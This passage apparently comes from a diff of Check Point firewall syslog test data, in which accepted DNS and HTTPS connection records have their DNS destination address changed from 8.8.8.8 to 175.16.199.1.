sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55058"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48429"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 
& FireWall-1"; proto:"17"; s_port:"33204"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48429"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33204"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"13.53.104.115"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53246"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53927"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; 
s_port:"60505"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53927"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60505"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57354"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57356"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42171"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38516"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39098"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60880"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42171"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38516"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39098"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60880"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34228"; service:"443"; 
service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51822"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51822"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57360"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x15,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.108.173.172"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34232"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x16,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"26"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"13.53.104.115"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53258"; service:"443"; 
service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x18,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"27"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57366"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x19,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"28"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.80"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46392"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1a,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"29"; version:"5"; __policy_id_tag:"product=VPN-1 & 
